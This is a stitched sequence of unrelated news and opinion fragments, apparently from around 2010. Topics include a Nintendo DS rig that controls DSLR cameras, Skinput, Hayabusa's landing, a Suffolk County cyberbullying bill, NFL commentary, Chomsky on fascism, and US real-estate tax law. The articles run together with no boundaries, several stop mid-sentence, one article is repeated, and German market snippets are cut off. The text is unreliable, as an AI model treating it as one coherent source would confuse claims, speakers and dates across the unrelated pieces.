After trying other hardware and firmware hacks for DSLR cameras and finding them unsatisfactory , HDR Labs set out to create their own system and thus was born OCC .
With a battery life of eight hours and sized small enough to fit into your jeans , the fully user - programmable OCC system promises to bring new shooting features and options to the DSLR community .
The required hardware ( beyond the Nintendo DS ) requires some skill with a soldering iron and the Arduino development board .
Install a small circuit board and an Atmega microcontroller into a DS game cartridge housing ( WarioWare : Twisted is big enough to hold the microcontroller ) , modify a shutter release cable , program , and start shooting .
What 's the point of hacking a DSLR to play nice with a handheld gaming console ?
Most consumer and professional - grade cameras have numerous capabilities that are either difficult or impossible to access : expanded high - dynamic range bracketing , time lapse shooting , and basic scripting for shooting a slew of images .
If you own a multi - thousand - dollar camera , should n't you be able to program new features and abilities to your DSLR ?
OCC 's range of homebrew software lets you not only control your camera 's exposure bracketing , but also trigger the shutter based on sound ( clap or yell to take a photo ) or a specific interval , and even allows for scripting suitable for astrophotography .
An online forum encourages future development of OCC , and there 's also a devkit ( linked at the bottom of the software page ) .
Try this out and let us know how it goes in the comments !
A Nintendo DS with a hacked game cartridge controlling a SLR camera [ HDR Labs ]
[ HDR Labs via Electronista ]
This story , " Hack Lets You Control Your DSLR Camera From Your Nintendo DS " was originally published by PCWorld .
With our nation having just played host to a big atheist convention trumpeting the intellectual superiority of unbelief , many may well be wondering why we still bother gazetting an extended long weekend to celebrate the death and resurrection of Jesus Christ .
For future generations this perplexity will grow if the NSW Government , dancing to the tune of intolerant secularists , has its way in our schools .
For more than 100 years , Scripture classes in schools have provided an avenue for children to learn about the Bible , the person of Jesus and the ethic that has underpinned societies such as Australia's .
This is entirely appropriate .
No serious historian – regardless of whether or not they are religious — doubts the formative influence of Christianity , its ethics and values on the legal , cultural and political development of Western civilisation .
Indeed it is the Judeo - Christian ethic that sets the way we live apart from the way other cultures live .
Now there will always be some parents who conscientiously object to their children being taught the Bible .
This is their right .
Advertisements
Director James Cameron was on MSNBC ’s Hardball today and when he was asked by host Chris Matthews about the power Glenn Beck , he delivered an ominous warning , “ Guys like Beck and the others , I think they are very dangerous to this country . ”
Some on the Left like Cameron are starting to wake up and realize that Beck , Limbaugh , and the others need to be taken seriously as more than entertainers .
Here is the video courtesy of Media Matters :
When asked about the power of right wing talkers , like Glenn Beck , Cameron said , “ Guys like Beck and the others , I think they are very dangerous to this country , and I think that someday they are going to have to answer to my children , your children , and their children for the world that they are helping to create right now . ”
Cameron was on the show to talk about climate change , and the environmental message in Avatar , but his statement above not only applies to the power of Beck and others when it comes to shaping attitudes about the environment , but how they feed into the darkest part of our national psyche .
Advertisements
People on the Left for too long have dismissed Beck , Limbaugh , and the other right wing talkers as nothing more than entertainment for the America ’s conservative right , and while they began that way , the stumbles and lack of leadership within the Republican Party , combined with the right ’s fear of a black president , has elevated them to an important leadership role .
Glenn
Beck may sound crazy to the rest of us , but he is a valued source of facts for the far right .
It is irrelevant to them , that much of what Beck states are not true .
What is important to them is that he confirms their own beliefs .
Currently on the right , misinformation is power , which means that Beck and Limbaugh are sitting in the catbird seat within the GOP .
These are the loudest voices against climate change .
Beck is doing the bidding of corporate America by letting our environment be destroyed while he embarks on a quest to discredit science .
Cameron is correct .
Glenn
Beck is dangerous , not because he disagrees with the left , but because he intentionally creates and spreads a climate of ignorance , fear , and misinformation for his own personal gain .
Beck is the poster child for the right wing philosophy of selfishness before community .
Here is the full interview in case you want to check it out :
Visit msnbc.com for breaking news , world news , and news about the economy
Skinput Harrison's Touchscreen Revolution
Developed as a response to the increasingly uncomfortable miniaturization of modern keypads , the third year Ph.D. student in Carnegie Mellon's
" We strap iPods and other devices onto our arms .
Why not utilize all the external surface area that 's already with us ? " said Harrison .
" What 's great about skin , unlike tables , is that it travels with us . "
At this stage , the Skinput armband contains a pico projector that displays the ' touchpad ' on the user 's hand or forearm , along with biosensors that recognize skin taps on corresponding locations of the body , based on bone and soft tissue variations .
The possibilities are staggering .
Among other examples , Harrison envisions a future device no larger than a small stack of coins , worn around the wrist or bicep , with all the capabilities of an iPhone .
Imagine typing an urgent email onto a projection on your hand .
The world has noticed .
Harrison and his colleagues will be presenting their paper at the ACM Computer - Human Interaction Conference in April , where they 've already been awarded one of 14 Best Paper Awards out of more than 1,300 submitted .
In addition , Harrison recently won one of 10 coveted Microsoft Research Ph.D. Fellowships .
He credits his time at Carnegie Mellon .
" My training and my inspiration come from the people that I work with , " he explained .
" The graduate students in our HCI Ph.D. program are the smartest bunch of students in the world .
They inspire me every day , and my advisor , Scott Hudson , does the same .
It 's not an accident that I 'm able to create these new technologies .
It 's the environment that I 'm in . "
Harrison 's larger goals include teaching others and bringing useful new technologies into the public domain , but his research has brought a welcome surprise .
" As someone who grew up loving technology , getting emails from people all around the world saying , ' This project is so cool , I 'm thinking of studying computer science , ' is an incredible reward .
To get other people excited about technology and interested in pursuing technology in their education and careers is an extra bonus , " he said .
Say goodbye to smeared screens and cracked glass , Chris Harrison has done it again .
The prolific computer scientist 's latest creation , Skinput , turns the human body into a giant touchscreen .
Developed as a response to the increasingly uncomfortable miniaturization of modern keypads , the third year Ph.D. student in Carnegie Mellon 's Human - Computer Interaction Institute ( HCII ) produced Skinput with Microsoft researchers Dan Morris and Desney Tan .
Harrison had already developed a way to turn ordinary tabletops into finger input surfaces , but says it was n't enough .
" We strap iPods and other devices onto our arms .
Why not utilize all the external surface area that 's already with us ? " said Harrison .
" What 's great about skin , unlike tables , is that it travels with us .
" At this stage , the Skinput armband contains a pico projector that displays the ' touchpad ' on the user 's hand or forearm , along with biosensors that recognize skin taps on corresponding locations of the body , based on bone and soft tissue variations .
The possibilities are staggering .
Among other examples , Harrison envisions a future device no larger than a small stack of coins , worn around the wrist or bicep , with all the capabilities of an iPhone .
Imagine typing an urgent email onto a projection on your hand .
The world has noticed .
Harrison and his colleagues will be presenting their paper at the ACM Computer - Human Interaction Conference in April , where they 've already been awarded one of 14 Best Paper Awards out of more than 1,300 submitted .
In addition , Harrison recently won one of 10 coveted Microsoft Research Ph.D. Fellowships .
He credits his time at Carnegie Mellon .
" My training and my inspiration come from the people that I work with , " he explained .
" The graduate students in our HCI Ph.D. program are the smartest bunch of students in the world .
They inspire me every day , and my advisor , Scott Hudson , does the same .
It 's not an accident that I 'm able to create these new technologies .
It 's the environment that I 'm in .
" Harrison 's larger goals include teaching others and bringing useful new technologies into the public domain , but his research has brought a welcome surprise .
" As someone who grew up loving technology , getting emails from people all around the world saying , ' This project is so cool , I 'm thinking of studying computer science , ' is an incredible reward .
To get other people excited about technology and interested in pursuing technology in their education and careers is an extra bonus , " he said .
Related Links : Skinput | Watch Video | HCII | Engadget Post | Gizmodo Post | NPR Post Homepage Story Archives
Public Service Announcement : ' Where do we get the free Obama care , and how do I sign up for that ? '
Chris | InformationLiberation
Apr. 07 , 2010
Es folgt der Börsen - Ticker zu wichtigen Kursbewegungen an den internationalen Finanzmärkten und ihren Ursachen : 07.28 Uhr - Folgende Aktien werden am Donnerstag mit einem Dividendenabschlag gehandelt : Deutsche Unternehmen Schlusskurs Dividende Angaben in Euro Volkswagen 137,40 4,86 Draegerwerk 74,00 0,19 ( Zusammengestellt vom Reuters Marktteam .
Bei Rückfragen wenden
Sie sich bitte
One ( Olympic ) flame dies – but maybe another flame flickers back into life .
All hail Cascadia , the nationalist dream of a new , free land that puts the environment , culture and liberal values first ?
Do n't laugh ( though do n't get too carried away either ) .
The name may sound somewhere between patent water softener and Prisoner of Zenda .
The logic of the idea , however , has plenty of hard thinking behind it .
In a sense , Thomas Jefferson started things rolling long ago .
He saw no particular reason why any fledgling US should stretch to the Pacific .
He was quite happy to countenance a separate republic way to the west .
And so , of course , were the people who built the distant country where Oregon , Washington and British Columbia met .
They dreamed of their own Cascadia , after the range of Cascade mountains that bound them together .
They felt – as many still feel – that rule from Washington or Ottawa is governance simply too far .
What ?
You had n't heard about the Cascadian Nationalist party and its entirely civil pursuit of separatism ?
That 's not entirely surprising .
When al - Qaida tore down New York 's twin towers , it also put up walls of bureaucracy along the border that made driving from Vancouver to Seattle heavy duty security business .
Stop , as I 've done , at the Blaine frontier post where Highway 99 meets Interstate 5 and you 'll find rather more hassle than at Dover to Calais .
But there is , nonetheless , some practical power here .
Portland , Seattle and Vancouver are an almost continuous metropolitan belt .
Think Leeds to Manchester to Liverpool .
The maze of islands and promontories around Puget Sound make one natural entity .
And the values of politics , almost of instinctive belief , are consistent too .
Abortion , euthanasia , co-ops , gay marriage – even socialism as a word that may sometimes mutter its name ?
Cascadia might sit quite happily just outside Stockholm .
Bush , Cheney , Fox News and Tea Party Texas are a world away .
Now , of course , Cascadia is n't going to happen anytime soon .
Indeed , except in a freedom lite version , it will probably never happen .
But there are plenty of reasons for warming over the embers .
One is simple physical logic .
Cascadia is a fit , a world top 20 economy waiting to happen , as well as a meeting of minds .
But even talking about it puts a country and a political system we ought to talk about constantly high in the frame .
For Americans , too much of the time , are patronisingly racist about Canada ( think Irish or Polish jokes ) and much too prone to play the Nafta bully when trade push comes to shove .
The British press may not have saluted Vancouver 's Olympic organisation , or weather , with quite the humility necessary for 2012 – but too many American journalists strode fresh off the plane with a bad case of curled lip .
Yet why , pray , is the Canadian way – or the Cascadian way – any more outlandish than the Mad Hatter 's tea party antics currently transfixing Washington DC ?
And why is constitutional change , as opposed to rightwing rage , such a forbidden American subject ?
Britain talks constitutional upheaval constantly : devolution , voting systems , local government , the lot .
Europe embraces historic upheaval .
But America , stuck with a duff legislative balance and party system prone to deliver only mush , pork barrels and impotence , can't find a way to adjust .
That 's what makes Cascadia such an alluring prospect .
Why should Portland have to put up with San Antonio 's tunes ?
Who needs manic fundamentalist rows that do n't resound across Puget Sound ?
Cascadia may never join the UN , but it's an idea of cohesion and radical progress whose day ought to come .
At the very least , there 's a region here , a region that ought to count – and it would light a flame under much DC beltway baloney if it did .
Business
Electric car keeps going and going
Posted
Apr 7 - Meet the " XD " - an electric car with enough power to drive for several days on a single charge .
Basmah Fahim reports .
A Japanese spacecraft is due to land on the Woomera test range in South Australia 's outback in June .
If the mission is successful , it will be the first time a spacecraft has made contact with an asteroid and returned to Earth .
The Hayabusa spacecraft , which made contact with an asteroid five years ago , is expected to be carrying valuable samples from it .
Australia Department of Innovations '
Dr Michael
Green says people in the vicinity should be able to see the spacecraft 's re-entry .
" There will be obviously a re-entry trail that will be visible , weather permitting , and that will be like a shooting star in the sky as it comes in to Woomera , " he said .
The Woomera Prohibited Area , as it is officially known , stretches 127,000 square kilometres in the north - west of South Australia .
This should be plenty of room for the well - travelled spacecraft to land safely , especially considering its size .
" [ It 's ] about the size of a basketball , or perhaps a little bigger , and weighs about 17 kilograms , " Dr Green said .
Dr Green says it is unclear how much of the asteroid has been collected , but estimates about 100 grams .
" This is a world first from the Japanese space agency to send out a spacecraft to an asteroid and bring sample material from that asteroid back to Earth for scientific analysis in Japan , " he said .
The asteroid explorer Hayabusa was launched on the May 9 , 2003 .
Its name is Japanese for " peregrine falcon " .
Japan 's space agency says in 2005 , after a 2 billion kilometre voyage , Hayabusa landed on the asteroid Itokawa to collect a sample of its surface .
One of the spacecraft 's engine 's was leaking fuel , but the agency says the mission continued anyway .
The mission 's dual purpose is to learn more about asteroids and test the capsule technology used for the operation .
Australia 's role
Australia 's Minister for Innovation , Industry , Science and Research , Kim Carr , says it is a great opportunity for Australia .
" This is a scientific mission which will allow Australia to demonstrate its capability , " he said .
" We 'll be working closely with the Japanese to ensure the safety of the Australian public and to demonstrate the fact that Australia is a very good place to undertake space activities . "
Senator Carr says Woomera , being remote and the largest land - based test range in the world , is ideally suited to spacecraft launches and landings .
" It 's controlled by the Defence Department , [ which ] has enormous expertise to safely manage the conduct of operations such as this and facilities that are available in terms of monitoring , " he said .
" We 'll have personnel stationed at the Japanese space centres to actually make decisions about the approvals necessary to ensure that ... the vehicle is on course , that it 's functioning properly and that there is security in terms of its operation .
" So we 're pretty confident that there 'll be no difficulties in regard to its landing safely . "
That ’s what draft Suffolk County Resolution No. 1390 - 2010 would do ( some line breaks added ) :
“ CYBER - BULLYING ” shall mean [ ( a ) ] engaging in a course of conduct or repeatedly committing acts of abusive behavior over a period of time [ ( b ) ] by communicating or causing a communication to be sent by mechanical or electronic means , posting statements on the internet or through a computer network . [ ( c ) ]
Acts of abusive behavior shall include , but not be limited to , taunting ; threatening ; intimidating ; insulting ; tormenting ; humiliating ; disseminating embarrassing or sexually explicit photographs , either actual or modified , of a minor ; disseminating the private , personal or sexual information , either factual or false , of a minor ; or sending hate mail … .
No person shall engage in cyber - bullying against a minor [ i.e. , someone under the age of 18 ] in the County of Suffolk … .
Any person who knowingly violates the provisions of this article shall be guilty of … [ a ] misdemeanor punishable by a fine of up to $ 1,000 and / or up to one year ’s imprisonment .
So let ’s see :
1 . You post several items on your Web site about how some juvenile criminal is an awful person .
You ’re guilty of “ repeatedly committing acts of abusive behavior ” — namely , “ insulting ” ” — “ against a minor ” by “ posting statements on the internet . ”
2. A 17 - year - old finds that her 17 - year - old boyfriend is cheating on her .
She sends him two e-mails calling him a “ lying , cheating scum . ”
She ’s guilty of repeatedly “ insulting ” the other person , and perhaps “ sending hate mail . ”
3 . A 17 - year - old e-mails her friend several times about her having had sex with a 17 - year - old boy .
She is guilty of “ disseminating the private … sexual information ” ( even though “ factual ” ) “ of a minor ” — the fact that the boy had had sex with her .
4. A 17 - year - old reveals to several of her friends , in separate e-mails , that her 17 - year - old ex-boyfriend has a sexually transmitted disease .
She is guilty of “ disseminating the private , personal … information ” ( even though “ factual ” ) “ of a minor . ”
5 . A 17 - year - old corresponds with his friends about a classmate ’s relatively little - known religious or political beliefs .
Is he guilty of “ disseminating the private , personal … information ” ( even though “ factual ” ) “ of a minor ” ?
Hard to tell , since “ private , personal … information ” is not defined .
6 . A 17 - year - old posts several photos on her Facebook page , depicting a 17 - year - old classmate doing something embarrassing ( but not sexual ) at a party .
She is guilty of “ disseminating embarrassing … photographs ” “ of a minor . ”
All these people would under the proposed ordinance be criminals , who could go to jail for up to a year because of their transgressions .
Just what our legal system needs .
And , yes , I know that this was prompted by an incident in which a Suffolk County 17 - year - old committed suicide after she had been bullied .
But this hardly justifies turning a wide range of normal — and , in some instances , constitutionally protected — behavior into a crime , and a large set of normally behaving teenagers into criminals .
If you want to outlaw a particular set of behavior that is indeed highly wrongful and highly dangerous , and you can define it in a way precise enough and narrow enough to be suitable for criminal punishment , that may well be sound .
But this proposal is not sound .
Abstimmung im US - Senat Republikaner blockieren Obamas Bankenreform
Niederlage für Barack Obama : Die Republikaner haben im Senat die Debatte über den Umbau des Finanzsystems vorerst gestoppt .
Der US - Präsident äußerte sich enttäuscht über die Blockade - und will jetzt bei den Bürgern für sein Vorhaben werben .
Phil Simms always has a unique , insightful take when it comes to quarterbacks .
The CBS lead analyst did n't disappoint when it came to weighing in on the Washington Redskins ' acquisition of six - time Pro Bowl quarterback Donovan McNabb from NFC East rival Philadelphia .
Simms said the move by arguably one of the game 's most creative play callers in Redskins head coach Mike Shanahan to acquire a strong - armed veteran quarterback to energize his new team was a " tremendous play . "
" I would think they all went into their little conference room at Redskins Park , " Simms said , " shut the door , looked at each other and started jumping up and down , high fiving , jumping around and going ' Alright !
We got him !'
" There is nothing that McNabb ( age 33 ) has done on the field that shows me there 's any sign of slowing down by him .
This is a different offense Donovan 's going to .
And Simms thought that Shanahan can probably utilize McNabb 's talents better than the Eagles .
He was citing Shanahan 's emphasis on the running game ( a lesser priority in pass - heavy Philly ) to set up play - action passing .
But Simms took his analysis of Shanahan 's ability to maximize McNabb 's strong , downfield arm a step further when he observed that offensive coordinator Kyle Shanahan , the 30 - year - old son of the two - time Super Bowl - winning former Denver Broncos head coach , has ascended into his own play - calling light .
Simms cited Kyle Shanahan 's success last season with Houston Texans quarterback Matt Schaub 's 4,770 - yard , 29 - touchdown breakout season with the 9 - 7 Texans .
" I can't say that Mike 's the best play caller anymore in the NFL because I think his son , Kyle , is better , " the former New York Giants Super Bowl - winning quarterback said .
" Look at Houston .
Look at Matt Schaub .
If Matt Schaub was n't in Houston , everybody would be adoring him .
" The only reason we do n't talk about him more is because of where it happened and the Texans did n't get to the playoffs . "
As for the Eagles with Kevin Kolb ?
Do n't dismiss them despite their offseason youth movement in purging nine players 27 or older .
" Philadelphia is really re-loading in a terrific way , " Simms said .
" ( Eagles coach ) Andy Reid and the organization has shown they know how to weather all these storms .
" It 's a great move for the Redskins to get Donovan McNabb .
But you know the Eagles have been in practice every day the last three years watching Kevin Kolb on the practice field and on tape .
Simms was impressed with Kolb after seeing him before the Eagles ' 30 - 27 win against the Broncos in December .
" I remember walking away saying , ' Kevin Kolb can throw it , ' " Simms said . "
He 's more athletic than I thought .
He has good feet and he can really get it out of his hand .
" I was very impressed .
" He 's a starting NFL quarterback . "
Appears in Whim Quarterly Issue # 1 . Written by Eric Automatic .
Photographs by Ashley Macknica
Lately , I ’ve been studying the melting of glaciers in the greater Himalayas .
Understanding the cascading effects of the slow - motion downsizing of one of the planet ’s most magnificent landforms has , to put it politely , left me dispirited .
It is impossible to focus on those Himalayan highlands without realizing that something that once seemed immutable and eternal has become vulnerable , even perishable .
Those magnificent glaciers are wasting away on an overheated planet , and no one knows what to do about it .
Another tipping point has also been on my mind lately , and it ’s left me no less melancholy .
In this case , the threat is to my own country , the United States .
We Americans too seem to have passed a tipping point .
Like the glaciers of the high Himalaya , long - familiar aspects of our nation are beginning to seem as if they are , in a sense , melting away .
In the last few months , as I ’ve roamed the world from San Francisco to Copenhagen to Beijing to Dubai , I ’ve taken to keeping a double - entry list of what works and what does n’t , country by country .
Unfortunately , it ’s become largely a list of what works elsewhere but does n’t work here .
In places such as China , South Korea , Sweden , Holland , Switzerland and ( until recently ) the United Arab Emirates , you find people hard at work on the challenges of education , transportation , energy and the environment .
In these places , one feels the kind of hopefulness and can - do optimism that used to abound in the United States .
Advertisement
China , a country I ’ve visited more than 100 times since 1975 , elicits an especially complicated set of feelings in me .
Its Leninist government does n’t always live up to Western ideals on such things as political transparency , the rule of law , human rights and democracy .
And yet it has managed to conjure an economic miracle .
In China today , you feel an unmistakable sense of energy and optimism in the air that , believe me , is bittersweet for an American pondering why the regenerative powers of his own country have gone missing .
As I ’ve traveled from China ’s gleaming , efficient airports to our often - chaotic and broken - down versions of the same , or ridden on Europe ’s high - speed trains that so sharply contrast with our clunky , slowly vanishing passenger rail system , I keep expanding my list of what works here at home and what does n’t .
Over time , the list ’s entries have fallen into three categories .
There are things that are robust and growing , replete with promise , the envy of the world .
Then there are those things that are still alive and kicking but are precariously balanced between growth and decline .
Finally , there are those things that are irredeemably broken .
Here is the score card as I see it .
Advertisement
Aspects of U.S. life that are still vigorous and filled with potential :
Biotechnology , which is delivering much of the world ’s most innovative research and ideas .
Silicon Valley , which has enormous inventiveness , energy and capital at its disposal .
Civil society , which , despite the collapse of the economy , seems to be luring the best and brightest young people , and superbly performs the crucial function of goading government and other institutions .
Advertisement
American philanthropy , which is the most evolved , well funded and innovative in the world .
The U.S. military , the best - led , - trained and - equipped on the planet , despite being repeatedly thrust into hopeless wars by stupid politicians .
The spirit and cohesiveness of small - town American life .
The arts , including our film industry , which remains the globe ’s sole superpower of entertainment , along with the requisite networks of orchestras , ballet companies , theaters , pop music groups and world - class museums .
Advertisement
Aspects of U.S. life that still function but need help :
Higher and secondary school education , in which America boasts some of the globe ’s preeminent institutions .
Increasingly , though , many of the best institutions are private , and jewel - in - the - crown public systems such as California ’s continue to be hit with devastating budget cuts .
Environmental protection , which compares favorably with that in other countries despite being underfunded .
The national energy system , which still delivers but is overdependent on oil and coal , and depends on a grid badly in need of upgrading .
Advertisement
Aspects of U.S. life in need of drastic intervention .
Public elementary education , which in most states is desperately underfunded and fails to deliver on its promise to provide all children with high - quality schooling .
The federal government , which is essentially paralyzed by partisanship and incapable of delivering solutions to the country ’s most pressing problems .
State governments , which are largely dysfunctional and nearly insolvent .
Advertisement
American infrastructure , including highways , docks , bridges and tunnels , dikes , waterworks and other essential systems we are n’t maintaining and upgrading as we should .
Airlines and the airports they service , which are almost Third World in equipment and service standards .
Passenger rail , which has not one mile of truly high - speed rail .
The financial system , whose over - paid executives and underregulated practices ran us off an economic cliff in 2008 and compromised the whole system in the eyes of the world .
Advertisement
The electronic media , which , except for public broadcasting and a vital and growing Internet , are an overly commercialized , broken - down mess that have let down the country in terms of keeping us informed .
Print media , which from newspaper publishing to book publishing are in crisis .
Basic manufacturing , which has fallen so far behind it seems headed for oblivion .
I started keeping these lists because I was searching for things that would banish that dispiriting sense that America is in decline .
And yet the can - do list remains unbearably short and the can ’t - do one grows each time I travel .
Advertisement
American prowess and promise , once seemingly as much a permanent part of the global landscape as glaciers , mountains and oceans , seems to be melting away by the day , just like the great Himalayan ice fields .
Orville Schell is the director of the Asia Society ’s Center on U.S. - China Relations .
He is the former dean of the Graduate School of Journalism at UC Berkeley and the author of many books on China .
A longer version of this article appears at tomdispatch.com .
The US needs to borrow to fund its massive budget deficit
Foreign demand for US Treasury bonds and notes fell by a record amount in December as China reduced its holdings .
The Treasury said foreign holdings of US debt dropped by $ 53bn , surpassing the previous record set last April .
China cut its holdings by $ 34.2 bn - meaning it is now the second - biggest US debt holder after Japan .
The drop in demand may mean that the US has to pay more to borrow , just as the government has to fund a record budget deficit .
In total , net purchases of long - term stocks , bonds and notes increased by $ 63.3 bn in December , which was lower than the increase of $ 126.4bn in the previous month , the Treasury said .
China was a net seller for a second straight month .
Its bond holdings amounted to $ 755.4bn in December , down from $ 789.6 bn the previous month .
China has previously questioned whether the US bonds are safe and whether it can sustain its deficits .
It has also questioned the US dollar 's role as the world 's reserve currency .
President Barack Obama earlier this month released a budget plan that expects the federal deficit for 2010 to be a record $ 1.56tn , surpassing last year 's record of $ 1.4tn .
The dollar remained lower against the euro after the data was released .
Due to the timing of Eminem ’s release of this freestyle , it was n’t ’till late yesterday when I first heard it , by which time it was already plastered over the internet .
I was considering not posting this up because I was too far behind , but his lyricism is too good to ignore , so here it is .
Eminem – Despicable ( Freestyle )
Audio clip : Adobe Flash Player ( version 9 or above ) is required to play this audio clip .
Download the latest version here .
You also need to have JavaScript enabled in your browser .
p.s. It may take you a few listens to pick up and analyse everything he says .
Chomsky Warns of Risk of Fascism in America
By Matthew Rothschild
15 April , 2010
Progressive.org
Noam Chomsky , the leading leftwing intellectual , warned last week that fascism may be coming to the United States .
“ I ’m just old enough to have heard a number of Hitler ’s speeches on the radio , ” he said , “ and I have a memory of the texture and the tone of the cheering mobs , and I have the dread sense of the dark clouds of fascism gathering ” here at home .
Chomsky was speaking to more than 1,000 people at the Orpheum Theatre in Madison , Wisconsin , where he received the University of Wisconsin ’s A.E. Havens Center ’s award for lifetime contribution to critical scholarship .
“ The level of anger and fear is like nothing I can compare in my lifetime , ” he said .
He cited a statistic from a recent poll showing that half the unaffiliated voters say the average tea party member is closer to them than anyone else .
“ Ridiculing the tea party shenanigans is a serious error , ” Chomsky said .
Their attitudes “ are understandable , ” he said .
“ For over 30 years , real incomes have stagnated or declined .
This is in large part the consequence of the decision in the 1970s to financialize the economy . ”
There is class resentment , he noted .
“ The bankers , who are primarily responsible for the crisis , are now reveling in record bonuses while official unemployment is around 10 percent and unemployment in the manufacturing sector is at Depression - era levels , ” he said .
And Obama is linked to the bankers , Chomsky explained .
“ The financial industry preferred Obama to McCain , ” he said .
“ They expected to be rewarded and they were .
Then Obama began to criticize greedy bankers and proposed measures to regulate them .
And the punishment for this was very swift :
They were going to shift their money to the Republicans .
So Obama said bankers are “ fine guys ” and assured the business world : ‘ I , like most of the American people , do n't begrudge people success or wealth .
That is part of the free - market system . ’
People see that and are not happy about it . ”
He said “ the colossal toll of the institutional crimes of state capitalism ” is what is fueling “ the indignation and rage of those cast aside . ”
“ People want some answers , ” Chomsky said .
“ They are hearing answers from only one place : Fox , talk radio , and Sarah Palin . ”
Chomsky invoked Germany during the Weimar Republic , and drew a parallel between it and the United States .
“ The Weimar Republic was the peak of Western civilization and was regarded as a model of democracy , ” he said .
And he stressed how quickly things deteriorated there .
“ In 1928 the Nazis had less than 2 percent of the vote , ” he said .
“ Two years later , millions supported them .
The public got tired of the incessant wrangling , and the service to the powerful , and the failure of those in power to deal with their grievances . ”
He said the German people were susceptible to appeals about “ the greatness of the nation , and defending it against threats , and carrying out the will of eternal providence . ”
When farmers , the petit bourgeoisie , and Christian organizations joined forces with the Nazis , “ the center very quickly collapsed , ” Chomsky said .
No analogy is perfect , he said , but the echoes of fascism are “ reverberating ” today , he said .
“ These are lessons to keep in mind . ”
Matthew Rothschild is the editor of The Progressive magazine
Read Chomsky 's Original Speech here
Become a Business Member
In addition to supporting local community radio , Business Memberships have many benefits including : on - air mentions during our Membership Drive and for the two weeks following , your logo and link featured on our website , Facebook page , and e-newsletters , Membership Drive thank you gifts , and MORE !
If you are interested in exploring the benefits of becoming a Business Member and supporting community radio , please check out our Business Member information .
Click here to become a Business Member and have your name and logo added below .
To play this content JavaScript must be turned on and the latest Flash player installed .
Latest Flash player available here Play in either Real OR Windows Media players
The Saudi Arabian poet Hissa Hilal caused a sensation in the Arab world when she appeared on the TV talent show Million 's Poet .
The format is a kind of Pop Idol for poets .
Dressed in a full burqa , with only her eyes showing , Hissa performed poetry that attacked religious extremism .
She also denounced conservative clerics for their stance on women 's rights , freedom of the press and their message on terror .
Despite receiving death threats from some viewers , Hissa was praised by the all - male panel of judges .
She went on to win a place in the final , where she gained the highest marks from the judges but was reduced to third place after a viewers ' vote .
Even so , she took home prize money of more than $ 700,000 .
Matthew Bannister spoke to Hissa on the line from Riyadh about the competition .
NEW YORK ( Reuters ) -
Tax breaks may not be enough of a sweetener to bring foreign buyers back into the flailing U.S. commercial real estate market , where falling rents , rising vacancies , a scarcity of debt financing and lack of property for sale have acted as deterrents .
Congress is considering a move to lower or eliminate U.S. taxes currently imposed on foreign investors of U.S. commercial real estate , where the number of sales has fallen off a cliff over the past two years .
The Real Estate Revitalization
Act of 2010 is designed to stir demand by foreigners and in turn lift prices and encourage even more buying by alleviating the U.S. tax burden imposed upon foreign sellers .
The number of commercial property deals fell by 55 percent in 2009 after diving 62 percent the previous year .
Yet many current owners are hanging on to their property despite values that are often less than the mortgages because lenders are extending the loans rather than take the loss from a foreclosure .
But if lawmakers hope that rejigging the tax laws for foreign sellers will suffice to kick - start the U.S. commercial property market , they may be in for a letdown .
Both foreign and U.S. investors are keeping a massive amount of money parked on the sidelines .
They are spooked not by taxes but by falling rents , rising vacancies and a lack of debt financing .
There is also a dearth of well - leased , financially stable office , retail , hotel apartment or warehouse buildings for sale .
The Real Estate Revitalization
Act of 2010 seeks to unwind some of the provisions under the Foreign Investment in Real Property Tax Act of 1980 ( FIRPTA ) , which imposes U.S. capital gains taxes on foreign sellers of U.S. real estate .
Such taxes are not imposed on foreigners who sell U.S. stocks and bonds .
GOODWILL GESTURE
But FIRPTA is not what is keeping foreign investors out of the market and is more of a good will gesture , said Andrew Weiner , a partner at Morrison & Foerster .
“ There ’s an overwhelming desire by non-U.S. investors to buy U.S. real estate right now , ” he said .
“ I ’m representing them , and not a single one of them is obsessed by FIRPTA . ”
For the U.S. government to forgo revenue in the form of taxes on foreigners at a time when it is grappling with a ballooning budget may not be politically popular right now .
FIRPTA , sponsored by then - Wyoming Sen. Malcolm Wallop , was a response to a wave of German investors who bought up ranch property in Western United States .
Prior to that , when a foreigner sold U.S. property , he generally was not taxed where the real estate was located , but rather was taxed in his home country .
But FIRPTA did not inhibit foreign owners from buying property during the U.S. commercial real estate boom of 2004 to 2007 .
They used complicated legal structures to mitigate the taxes .
Although the 2010 legislation seeks to make things a bit easier for foreign sellers , it would not change taxes on direct ownership , a popular form of investment .
It chiefly affects the taxes on selling shares of companies that own the property .
If a foreigner owns shares of a company in which real estate comprises more than 50 percent of its assets , that investor would not be subject to U.S. capital gains taxes upon the sale of that stock .
Under the Real Estate Revitalization
Act , the sale of property by a Real Estate Investment Trust ( REIT ) would no longer be treated as capital gains for a foreign investor but as ordinary dividends .
Although those face a 30 percent dividend distribution tax , many countries have treaties with the United States that reduce or eliminate that tax .
That would apply to holders of shares of all REITs -- listed or not , public or not -- and would eliminate a 5 percent ownership cap .
The new bill also would treat the sale of stocks by foreigners of a REIT that is less than half foreign - owned as a stock sale and not subject to U.S. taxes .
Currently , when such a REIT sells all its property and liquidates , it is treated as a property sale and subject to U.S. capital gain taxes -- a 35 percent hit and up to 55 percent if a “ branch profits tax ” applies .
That tax treats U.S. operations of a foreign company as a separate subsidiary , another source of taxes .
WASHINGTON ‘NOT PLAYING FAIR ’
The Real Estate Revitalization
Act of 2010 , introduced to Congress in January and sponsored by Rep. Joseph Crowley of New York , has been referred to the U.S. House Committee on Ways and Means and is now seeking a larger bill to which it can attach itself , a Crowley spokeswoman said .
Supporters of the bill say it would put commercial real estate on par with investment in stocks and bonds .
“ The United States is not playing fair on this issue , ” said Dan Fasulo , managing director of real estate research firm Real Capital Analytics .
“ It has the ability to flush public REITs with billions of additional dollars of capital that will eventually filter down to the direct property market . ”
The Real Estate Roundtable , an industry trade group , said it hopes the changes would lure about $ 100 billion sitting on the sidelines back into the U.S. commercial property market .
“ That combined with even 50 percent debt financing would bring enormous purchases and thereby stabilize what have been falling values of U.S. commercial real estate , ” said Robert Schachat , vice chairman of the Real Estate Round Table Tax Policy Advisory Committee .
Andy Short , a tax attorney and partner at Paul , Hastings , Janofsky & Walker , said that many attorneys representing foreign funds are interested in the changes because the funds often own their real estate through private REITs .
“ I think it will help , it will help in the margins , ” Short said .
MADISON , Wis. — Annie Laurie Gaylor clicked through a flurry of e-mail messages warning her to repent or she would burn in hell .
“ Herod , ” one messenger called her .
Ms. Gaylor leaned back and sipped from a cup of tea , unfazed and even a bit surprised at the relative tameness of the attacks .
Fresh from her latest godless triumph , she had expected more vitriol .
